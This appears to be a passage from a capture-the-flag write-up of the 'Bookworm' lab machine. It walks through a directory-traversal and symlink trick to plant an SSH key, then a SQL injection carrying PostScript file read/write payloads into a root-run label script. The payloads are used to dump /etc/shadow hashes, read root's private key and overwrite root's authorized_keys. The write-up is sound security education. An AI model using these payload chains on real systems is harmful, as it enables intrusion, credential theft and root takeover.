frank@bookworm:/home/neil/converter$ curl localhost -H "Host: bookworm.htb" -s | md5sum
e529bcdf6b4a465a3f179a2baddf36cc -
frank@bookworm:/home/neil/converter$ curl localhost:3000 -s | md5sum
e529bcdf6b4a465a3f179a2baddf36cc -
The source shows that converter
runs on 3001:
const app = express();
const port = 3001;
...[snip]...
app.listen(port, "127.0.0.1", () => {
console.log(`Development converter listening on port ${port}`);
});
Looking for potential services that might launch this, it’s interesting that there are three that I can’t read:
frank@bookworm:/home/neil/converter$ grep -r 3001 /etc/systemd/
grep: /etc/systemd/system/bot.service: Permission denied
grep: /etc/systemd/system/devserver.service: Permission denied
grep: /etc/systemd/system/bookworm.service: Permission denied
Seems likely that bookworm.service
is the main website and bot.service
is the bot that interacts with the XSS. That would leave devserver.service
to potentially be converter
?
It seems like this is likely running as neil:
frank@bookworm:/home/neil/converter/calibre$ ps auxww | grep neil
neil 1691 0.0 1.3 608368 54224 ? Ssl 11:14 0:00 /usr/bin/node index.js
frank@bookworm:/proc/1691$ ls -l
ls: cannot read symbolic link 'cwd': Permission denied
ls: cannot read symbolic link 'root': Permission denied
ls: cannot read symbolic link 'exe': Permission denied
total 0
-r--r--r-- 1 neil neil 0 Jan 17 15:22 arch_status
dr-xr-xr-x 2 neil neil 0 Jan 17 11:14 attr
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 autogroup
-r-------- 1 neil neil 0 Jan 17 15:22 auxv
-r--r--r-- 1 neil neil 0 Jan 17 11:14 cgroup
--w------- 1 neil neil 0 Jan 17 15:22 clear_refs
-r--r--r-- 1 neil neil 0 Jan 17 11:14 cmdline
-rw-r--r-- 1 neil neil 0 Jan 17 11:14 comm
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 coredump_filter
-r--r--r-- 1 neil neil 0 Jan 17 15:22 cpuset
lrwxrwxrwx 1 neil neil 0 Jan 17 15:22 cwd
-r-------- 1 neil neil 0 Jan 17 15:22 environ
lrwxrwxrwx 1 neil neil 0 Jan 17 11:14 exe
dr-x------ 2 neil neil 0 Jan 17 11:14 fd
dr-x------ 2 neil neil 0 Jan 17 15:22 fdinfo
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 gid_map
-r-------- 1 neil neil 0 Jan 17 15:22 io
-r--r--r-- 1 neil neil 0 Jan 17 15:22 limits
-rw-r--r-- 1 neil neil 0 Jan 17 11:14 loginuid
dr-x------ 2 neil neil 0 Jan 17 15:22 map_files
-r--r--r-- 1 neil neil 0 Jan 17 11:14 maps
-rw------- 1 neil neil 0 Jan 17 15:22 mem
-r--r--r-- 1 neil neil 0 Jan 17 15:22 mountinfo
-r--r--r-- 1 neil neil 0 Jan 17 15:22 mounts
-r-------- 1 neil neil 0 Jan 17 15:22 mountstats
dr-xr-xr-x 54 neil neil 0 Jan 17 15:22 net
dr-x--x--x 2 neil neil 0 Jan 17 15:22 ns
-r--r--r-- 1 neil neil 0 Jan 17 15:22 numa_maps
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 oom_adj
-r--r--r-- 1 neil neil 0 Jan 17 15:22 oom_score
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 oom_score_adj
-r-------- 1 neil neil 0 Jan 17 15:22 pagemap
-r-------- 1 neil neil 0 Jan 17 15:22 patch_state
-r-------- 1 neil neil 0 Jan 17 15:22 personality
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 projid_map
lrwxrwxrwx 1 neil neil 0 Jan 17 15:22 root
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 sched
-r--r--r-- 1 neil neil 0 Jan 17 15:22 schedstat
-r--r--r-- 1 neil neil 0 Jan 17 11:14 sessionid
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 setgroups
-r--r--r-- 1 neil neil 0 Jan 17 15:22 smaps
-r--r--r-- 1 neil neil 0 Jan 17 15:22 smaps_rollup
-r-------- 1 neil neil 0 Jan 17 15:22 stack
-r--r--r-- 1 neil neil 0 Jan 17 11:14 stat
-r--r--r-- 1 neil neil 0 Jan 17 15:22 statm
-r--r--r-- 1 neil neil 0 Jan 17 11:14 status
-r-------- 1 neil neil 0 Jan 17 15:22 syscall
dr-xr-xr-x 9 neil neil 0 Jan 17 15:22 task
-r--r--r-- 1 neil neil 0 Jan 17 15:22 timers
-rw-rw-rw- 1 neil neil 0 Jan 17 15:22 timerslack_ns
-rw-r--r-- 1 neil neil 0 Jan 17 15:22 uid_map
-r--r--r-- 1 neil neil 0 Jan 17 15:22 wchan
Everything in the /proc
directory for this process is owned by neil.
First I want to take a look at the site. I’ll use my SSH session to get a tunnel (-L 3001:localhost:3001
) so I can load it in my browser. It’s a page to convert files:
The source shows two routes:
const convertEbook = path.join(__dirname, "calibre", "ebook-convert");
app.get("/", (req, res) => {
const { error } = req.query;
res.render("index.njk", { error: error === "no-file" ? "Please specify a file to convert." : "" });
});
app.post("/convert", async (req, res) => {
const { outputType } = req.body;
if (!req.files || !req.files.convertFile) {
return res.redirect("/?error=no-file");
}
const { convertFile } = req.files;
const fileId = uuidv4();
const fileName = `${fileId}${path.extname(convertFile.name)}`;
const filePath = path.resolve(path.join(__dirname, "processing", fileName));
await convertFile.mv(filePath);
const destinationName = `${fileId}.${outputType}`;
const destinationPath = path.resolve(path.join(__dirname, "output", destinationName));
console.log(filePath, destinationPath);
const converter = child.spawn(convertEbook, [filePath, destinationPath], {
timeout: 10_000,
});
converter.on("close", (code) => {
res.sendFile(path.resolve(destinationPath));
});
});
/
just shows the form. /convert
takes input and calls ./calibre/ebook-convert
.
Running this with -h
shows the help:
frank@bookworm:/home/neil/converter/calibre$ ./ebook-convert -h
Usage: ebook-convert input_file output_file [options]
Convert an e-book from one format to another.
input_file is the input and output_file is the output. Both must be specified as the first two arguments to the command.
The output e-book format is guessed from the file extension of output_file. output_file can also be of the special format .EXT where EXT is the output file extension. In this case, the name of the output file is derived from the name of the input file. Note that the filenames must not start with a hyphen. Finally, if output_file has no extension, then it is treated as a folder and an "open e-book" (OEB) consisting of HTML files is written to that folder. These files are the files that would normally have been passed to the output plugin.
After specifying the input and output file you can customize the conversion by specifying various options. The available options depend on the input and output file types. To get help on them specify the input and output file and then use the -h option.
For full documentation of the conversion system see
https://manual.calibre-ebook.com/conversion.html
Whenever you pass arguments to ebook-convert that have spaces in them, enclose the arguments in quotation marks. For example: "/some path/with spaces"
Options:
--version show program's version number and exit
-h, --help show this help message and exit
--list-recipes List builtin recipe names. You can create an e-book from a
builtin recipe like this: ebook-convert "Recipe Name.recipe"
output.epub
Created by Kovid Goyal <kovid@kovidgoyal.net>
It takes file formats based on the input and output extensions. If there’s no output extension, it assumes it’s “open e-book (OEB)” format.
There’s a lot of “recipes”:
frank@bookworm:/home/neil/converter/calibre$ ./ebook-convert --list-recipes
Available recipes:
+info
.týždeň
10minutos
180.com.uy
1843
20 Minutos
20 minutes
...[snip]...
시사인 라이브
조선일보
중앙일보
한겨례
1690 recipes available
I’ll create a test file and play with different ways of converting.
frank@bookworm:/home/neil/converter/calibre$ echo "this is a test" > /tmp/test.txt
frank@bookworm:/home/neil/converter/calibre$ ./ebook-convert /tmp/test.txt /tmp/test
1% Converting input to HTML...
InputFormatPlugin: TXT Input running
on /tmp/test.txt
Language not specified
Creator not specified
Building file list...
Normalizing filename cases
Rewriting HTML links
flow is too short, not running heuristics
Forcing index.html into XHTML namespace
34% Running transforms on e-book...
Merging user specified metadata...
Detecting structure...
Auto generated TOC with 0 entries.
Flattening CSS and remapping font sizes...
Source base font size is 12.00000pt
Removing fake margins...
Cleaning up manifest...
Trimming unused files from manifest...
Creating OEB Output...
67% Running OEB Output plugin
OEB output written to /tmp/test
Output saved to /tmp/test
frank@bookworm:/home/neil/converter/calibre$ ls -l /tmp/test
total 20
-rw-rw-r-- 1 frank frank 1062 Jan 17 15:14 content.opf
-rw-rw-r-- 1 frank frank 405 Jan 17 15:14 index.html
-rw-rw-r-- 1 frank frank 51 Jan 17 15:14 page_styles.css
-rw-rw-r-- 1 frank frank 154 Jan 17 15:14 stylesheet.css
-rw-rw-r-- 1 frank frank 485 Jan 17 15:14 toc.ncx
It creates a directory with files when there’s no extension. If I write to another .txt
, it basically copies it, adding a bunch of whitespace:
frank@bookworm:/home/neil/converter/calibre$ ./ebook-convert /tmp/test.txt /tmp/test2.txt
1% Converting input to HTML...
InputFormatPlugin: TXT Input running
on /tmp/test.txt
Language not specified
Creator not specified
Building file list...
Normalizing filename cases
Rewriting HTML links
flow is too short, not running heuristics
Forcing index.html into XHTML namespace
34% Running transforms on e-book...
Merging user specified metadata...
Detecting structure...
Auto generated TOC with 0 entries.
Flattening CSS and remapping font sizes...
Source base font size is 12.00000pt
Removing fake margins...
Cleaning up manifest...
Trimming unused files from manifest...
Creating TXT Output...
67% Running TXT Output plugin
Converting XHTML to TXT...
TXT output written to /tmp/test2.txt
Output saved to /tmp/test2.txt
frank@bookworm:/home/neil/converter/calibre$ cat /tmp/test2.txt
this is a test
When I submit a file for convert via the website, the POST request looks like (with some unnecessary headers removed):
POST /convert HTTP/1.1
Host: 127.0.0.1:3001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Type: multipart/form-data; boundary=---------------------------416641782035355546973084316586
Content-Length: 473
Origin: http://127.0.0.1:3001
Connection: close
Referer: http://127.0.0.1:3001/
Cookie: lang=en-US
-----------------------------416641782035355546973084316586
Content-Disposition: form-data; name="convertFile"; filename="test.txt"
Content-Type: text/plain
test data
-----------------------------416641782035355546973084316586
Content-Disposition: form-data; name="outputType"
pdf
-----------------------------416641782035355546973084316586--
The output filename is generated here:
const destinationName = `${fileId}.${outputType}`;
const destinationPath = path.resolve(path.join(__dirname, "output", destinationName));
That also looks like a directory traversal vulnerability. I’ll try updating this in Burp Repeater:
It shows success, and the file exists:
frank@bookworm:/home/neil/converter/calibre$ cat /tmp/web.txt
test data!
If I can get write as neil
, I would want to write an SSH key into their authorized_keys
file. But that has no extension, which by default means that ebook-convert
would create the directory, which is not useful.
If I want to write a text file but without a .txt
, I’ll try a symlink:
frank@bookworm:/home/neil/converter/calibre$ ln -s /tmp/output /tmp/output.txt
frank@bookworm:/home/neil/converter/calibre$ ./ebook-convert /tmp/test.txt /tmp/output.txt
1% Converting input to HTML...
InputFormatPlugin: TXT Input running
on /tmp/test.txt
Language not specified
Creator not specified
Building file list...
Normalizing filename cases
Rewriting HTML links
flow is too short, not running heuristics
Forcing index.html into XHTML namespace
34% Running transforms on e-book...
Merging user specified metadata...
Detecting structure...
Auto generated TOC with 0 entries.
Flattening CSS and remapping font sizes...
Source base font size is 12.00000pt
Removing fake margins...
Cleaning up manifest...
Trimming unused files from manifest...
Creating TXT Output...
67% Running TXT Output plugin
Converting XHTML to TXT...
TXT output written to /tmp/output.txt
Output saved to /tmp/output.txt
frank@bookworm:/home/neil/converter/calibre$ cat /tmp/output
this is a test
It worked! I wrote text to /tmp/output
.
Moving to the web, I’ll create a new symlink to test:
frank@bookworm:/home/neil/converter/calibre$ ln -s /tmp/outweb /tmp/outweb.txt
When I send the same payload targeting /tmp/outweb.txt
, it fails:
The issue here is protected symlinks, which is a kernel option that:
When set to “1” symlinks are permitted to be followed only when outside a sticky world-writable directory, or when the uid of the symlink and follower match, or when the directory owner matches the symlink’s owner.
Because the link is in a world-writable directory and the uid of the symlink (frank) and the follower (neil) don’t match, it doesn’t follow and crashes. frank doesn’t have permissions to check if this is enabled:
frank@bookworm:/home/neil/converter/calibre$ cat /proc/sys/fs/protected_symlinks
cat: /proc/sys/fs/protected_symlinks: Permission denied
To test this theory, I’ll write a symlink in frank’s home directory instead:
frank@bookworm:~$ ln -s /tmp/outweb outweb.txt
It still points at /tmp/outweb
. When I send the request to the site, it returns 200:
And the data is in /tmp/outweb
owned by neil:
frank@bookworm:~$ ls -l /tmp/outweb
-rw-r--r-- 1 neil neil 16 Jan 17 16:37 /tmp/outweb
frank@bookworm:~$ cat /tmp/outweb
test data!
That looks like arbitrary write as neil.
From frank’s home directory, I’ll write a new link pointing to neil’s authorized_keys
file:
frank@bookworm:~$ ln -s /home/neil/.ssh/authorized_keys pwn.txt
I’ll send my public SSH key targeting the link:
Now when I try to SSH as neil, it works:
oxdf@hacky$ ssh -i ~/keys/ed25519_gen neil@bookworm.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)
...[snip]...
neil@bookworm:~$
neil is able to run the genlabel
script as root:
neil@bookworm:~$ sudo -l
Matching Defaults entries for neil on bookworm:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User neil may run the following commands on bookworm:
(ALL) NOPASSWD: /usr/local/bin/genlabel
Only root can run it, and it takes an order it:
neil@bookworm:~$ genlabel
-bash: /usr/local/bin/genlabel: Permission denied
neil@bookworm:~$ sudo genlabel
Usage: genlabel [orderId]
When run, it generates a .pdf
and a postscript (.ps
) file:
neil@bookworm:~$ sudo genlabel 5
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmp7wvrduelprintgen
neil@bookworm:~$ ls /tmp/tmp7wvrduelprintgen/
output.pdf output.ps
I’ll scp
that to my host, and open it to see a label:
genlabel
is actually a Python script. The script connects to the DB as the bookworm user, just like the website:
with open("/usr/local/labelgeneration/dbcreds.txt", "r") as cred_file:
db_password = cred_file.read().strip()
cnx = mysql.connector.connect(user='bookworm', password=db_password,
host='127.0.0.1',
database='bookworm')
It uses the input order id to query the DB:
cursor = cnx.cursor()
query = "SELECT name, addressLine1, addressLine2, town, postcode, Orders.id as orderId, Users.id as userId FROM Orders LEFT JOIN Users On Orders.userId = Users.id WHERE Orders.id = %s" % sys.argv[1]
cursor.execute(query)
This is done in an insecure manner, and will be vulnerable to SQL injection.
It creates a postscript file from a template and replaces some template strings with the data from the DB:
temp_dir = tempfile.mkdtemp("printgen")
postscript_output = os.path.join(temp_dir, "output.ps")
# Temporary until our virtual printer gets fixed
pdf_output = os.path.join(temp_dir, "output.pdf")
with open("/usr/local/labelgeneration/template.ps", "r") as postscript_file:
file_content = postscript_file.read()
generated_ps = ""
print("Fetching order...")
for (name, address_line_1, address_line_2, town, postcode, order_id, user_id) in cursor:
file_content = file_content.replace("NAME", name) \
.replace("ADDRESSLINE1", address_line_1) \
.replace("ADDRESSLINE2", address_line_2) \
.replace("TOWN", town) \
.replace("POSTCODE", postcode) \
.replace("ORDER_ID", str(order_id)) \
.replace("USER_ID", str(user_id))
print("Generating PostScript file...")
with open(postscript_output, "w") as postscript_file:
postscript_file.write(file_content)
Finally it uses subprocess
to run ps2pdf
on the file and generate a PDF:
print("Generating PDF (until the printer gets fixed...)")
output = subprocess.check_output(["ps2pdf", "-dNOSAFER", "-sPAPERSIZE=a4", postscript_output, pdf_output])
if output != b"":
print("Failed to convert to PDF")
print(output.decode())
print("Documents available in", temp_dir)
os.chmod(postscript_output, 0o644)
os.chmod(pdf_output, 0o644)
os.chmod(temp_dir, 0o755)
# Currently waiting for third party to enable HTTP requests for our on-prem printer
# response = requests.post("http://printer.bookworm-internal.htb", files={"file": open(postscript_output)})
The -dNOSAFER
flag is passed to ps2pdf
, which, according to Ghost Script docs means:
-dNOSAFER
(equivalent to-dDELAYSAFER
).This flag disables SAFER mode until the
.setsafe
procedure is run. This is intended for clients or scripts that cannot operate in SAFER mode. If Ghostscript is started with-dNOSAFER
or-dDELAYSAFER
, PostScript programs are allowed to read, write, rename or delete any files in the system that are not protected by operating system permissions.
Being able to read and write files seems very useful.
I noted above that the SQL query made by genlabel
looked like it should be vulnerable to SQL injection. If that is the case, I can control what gets written into the .ps
file. PostScript is a page description language used to define what a document will look like, similar to a PDF. If I can control the PS output, then when it is passed to ps2pdf
in such a way that dangerous postscript commands can be run, I can read and write files.
The SQL query is:
SELECT name, addressLine1, addressLine2, town, postcode, Orders.id as orderId, Users.id as userId FROM Orders LEFT JOIN Users On Orders.userId = Users.id WHERE Orders.id = %s
I’ll give it a order that doesn’t exist (99999) and then use UNION injection to return a row of values I control:
neil@bookworm:~$ sudo genlabel '99999 UNION SELECT 1,2,3,4,5,6,7;'
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmpr7ejbvakprintgen
I’ll scp
the output to my host:
oxdf@hacky$ scp -i ~/keys/ed25519_gen neil@bookworm.htb:/tmp/tmpr7ejbvakprintgen/* .
output.pdf 100% 43KB 133.5KB/s 00:00
output.ps 100% 1751 15.6KB/s 00:00
The output I set shows up in the PS file in blocks like this:
...[snip]...
/Courier-bold
20 selectfont
50 550 moveto
(1) show
/Courier
20 selectfont
50 525 moveto
(2) show
/Courier
20 selectfont
50 500 moveto
(3) show
/Courier
20 selectfont
50 475 moveto
(4) show
/Courier
20 selectfont
50 450 moveto
(5) show
...[snip]...
These show up in the PDF:
So the SQL injection works.
The documentation for how to do file I/O through PostScript isn’t great, but this Stack Overflow answer offers a nice POC:
/outfile1 (output1.txt) (w) file def
outfile1 (blah blah blah) writestring
outfile1 closefile
/inputfile (output1.txt) (r) file def
inputfile 100 string readstring
pop
inputfile closefile
/outfile2 (output2.txt) (w) file def
outfile2 exch writestring
outfile2 closefile
It write a file, then reads that file and writes the results to another file. I can start with writing a file with just the last block replacing exch
with some static text:
/outfile (output.txt) (w) file def
outfile (this is a test) writestring
outfile closefile
Putting that into the injection:
neil@bookworm:~$ sudo genlabel '99999 UNION SELECT "0xdf)
>
> /outfile (output.txt) (w) file def
> outfile (this is a test) writestring
> outfile closefile
>
> (test", 2,3,4,5,6,7'
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmpce7s4u1wprintgen
I don’t care about the PDF output, but rather, that there’s an output.txt
in the current directory:
neil@bookworm:~$ ls -l output.txt
-rw-r--r-- 1 root root 14 Jan 17 18:41 output.txt
neil@bookworm:~$ cat output.txt
this is a test
I spent a long time with ChatGPT trying to get a POC that would read a file into the PDF without success. I’ll end up back with the POC from above, this time grabbing the second and third blocks:
/inputfile (/etc/shadow) (r) file def
inputfile 10000 string readstring
pop
inputfile closefile
/outfile (output.txt) (w) file def
outfile exch writestring
outfile closefile
I’ll need to increase the number on the second line, as that’s the number of bytes to be read, and I want more than 100. I’ll run this via the SQL injection:
neil@bookworm:~$ sudo genlabel '99999 UNION SELECT "0xdf)
>
> /inputfile (/etc/shadow) (r) file def
> inputfile 10000 string readstring
> pop
> inputfile closefile
>
> /outfile (output.txt) (w) file def
> outfile exch writestring
> outfile closefile
>
> (test", 2,3,4,5,6,7'
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmpqsikna5vprintgen
neil@bookworm:~$ cat output.txt
root:$6$X.PJezLobVQOLuGu$nDnaPx.G5/nXr9I7WI0h8Sw0vjeFcOChirHr1s0zNyaid7X5U26fB5MXOIQB/oR4fb7xiaN/.bXdfAkGwtXL6.:19387:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
usbmux:*:19386:0:99999:7:::
sshd:*:19386:0:99999:7:::
systemd-coredump:!!:19386::::::
lxd:!:19386::::::
frank:$6$iQwYpaCFHgzFXVbi$gAKLi4oKtDPb4uaCGW3RkabZ8DyAnQfxbaqhoiAeAsGmP776eOyQt6bvYPPUJ4PAe2PJPanzm3sH5KSiqzrlF.:19387:0:99999:7:::
neil:$6$rN642RtN9dzlaylh$/7DIfm9515mWvCPWM/wL/ANkJJPtKkUNURqcmu/VseEhLch1pQgX7c3l3ij2vA3MmM3PZV5WOrLM7u3gy2V3W1:19387:0:99999:7:::
mysql:!:19387:0:99999:7:::
fwupd-refresh:*:19479:0:99999:7:::
_laurel:!:19480::::::
james:$6$m07oa4vs5KUfYS/j$SjFJnikcpxhLK5wt3cOEE218N1Bfv4M3bQyhUspkepSBzefsAKCFpXbI.JS8N/p17IaYSgG0A217veas0iSC51:19513:0:99999:7:::
That’s file read!
With the file write POC, I can simply update it to write my public SSH key into root’s authorized_keys
file:
neil@bookworm:~$ sudo genlabel '99999 UNION SELECT "0xdf)
>
> /outfile (/root/.ssh/authorized_keys) (w) file def
> outfile (ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIK/xSi58QvP1UqH+nBwpD1WQ7IaxiVdTpsg5U19G3d nobody@nothing) writestring
> outfile closefile
>
> (test", 2,3,4,5,6,7'
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmpp2ccw7ubprintgen
Then I can SSH in as root:
oxdf@hacky$ ssh -i ~/keys/ed25519_gen root@bookworm.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)
...[snip]...
root@bookworm:~#
And read the flag:
root@bookworm:~# cat root.txt
aab5a8b7************************
One way to get a shell via read is to read the SSH key of root. Each user so far has has a id_eh25519
file in their .ssh
directory. I’ll try to read roots:
neil@bookworm:~$ sudo genlabel '99999 UNION SELECT "0xdf)
>
> /inputfile (/root/.ssh/id_ed25519) (r) file def
> inputfile 1000 string readstring
>
> pop
> inputfile closefile
>
> /outfile (output.txt) (w) file def
> outfile exch writestring
> outfile closefile
>
> (test", 2,3,4,5,6,7'
Fetching order...
Generating PostScript file...
Generating PDF (until the printer gets fixed...)
Documents available in /tmp/tmpv5gne53tprintgen
The private key is in output.txt
:
neil@bookworm:~$ cat output.txt
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
...[snip]...
-----END OPENSSH PRIVATE KEY-----
As long as I haven’t already overwritten authorized_keys
, I can use that to SSH into the box:
oxdf@hacky$ ssh -i ~/keys/bookworm-root root@bookworm.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)
...[snip]...
root@bookworm:~#
I’m going to take a quick look at the code in the website that allows for downloading of e-books either as a single PDF or as multiple files in a zip.
A useful bit of background for understanding this code is to understand how the NodeJS Express framework handles Query Parameters. This blog post demonstrates with some nice examples. ?color=black
sets that parameter to a string, black
. But ?color=black&color=green
sets it to a list like ["black", "green"]
.
That’s how the code is able to use a typeof
call to differentiate between a single download and multiple:
const { bookIds } = req.query;
if (typeof bookIds === "string") {
...[snip]...
} else if (Array.isArray(bookIds)) {
...[snip]...
} else {
res.sendStatus(404);
}
The single download code creates a filename of ID.pdf
:
const fileName = `${bookIds}.pdf`;
Then it calls res.download
(docs), which takes a path to the file, a filename, and options, and returns a file with the given name:
res.download(bookIds, fileName, { root: path.join(__dirname, "books") });
Here, the bookIds
is a single number, and the fileName
is the [number].pdf
. The option of root
puts it in the books
directory, which is a directory that holds a bunch of number files that are pdfs:
root@bookworm:/var/www/bookworm# file books/*
books/1: PDF document, version 1.3
books/10: PDF document, version 1.3
books/11: PDF document, version 1.3
books/12: PDF document, version 1.3
books/13: PDF document, version 1.3
books/14: PDF document, version 1.3
books/15: PDF document, version 1.3
books/16: PDF document, version 1.3
books/17: PDF document, version 1.3
books/18: PDF document, version 1.3
books/19: PDF document, version 1.3
books/2: PDF document, version 1.3
books/20: PDF document, version 1.3
books/3: PDF document, version 1.3
books/4: PDF document, version 1.3
books/5: PDF document, version 1.3
books/6: PDF document, version 1.3
books/7: PDF document, version 1.3
books/8: PDF document, version 1.3
books/9: PDF document, version 1.3
Injection traversal into this doesn’t work.
This is because of the root
parameter passed to download
, which has Express return 403 if it tries to read outside the root directory, in this case /var/www/bookworm/books
.
This code path uses the archiver module. It creates an archiver object, and then uses the file
API to add files to the object.
const arch = archiver("zip");
for (const id of bookIds) {
const fileName = (await Book.findByPk(id))?.title ?? "Unknown";
arch.file(path.join(__dirname, "books", id), { name: `${fileName}.pdf` });
}
res.attachment(`Order ${orderId}.zip`).type("zip");
arch.on("end", () => res.end()); // end response when archive stream ends
arch.pipe(res);
arch.finalize();
The file path this time is created with a path.join(__dirname, "books", id)
, which is totally open to traversal as I control id
.
It tries to look the book name up in the database using the Book
object, but it is nice enough to use notation such that if no book name is found, it will fall back to “Unknown”. This is why all of my exfil when I do get a directory traversal comes out as Unknown.pdf
, and what limits me from trying to collect multiple files in the same archive.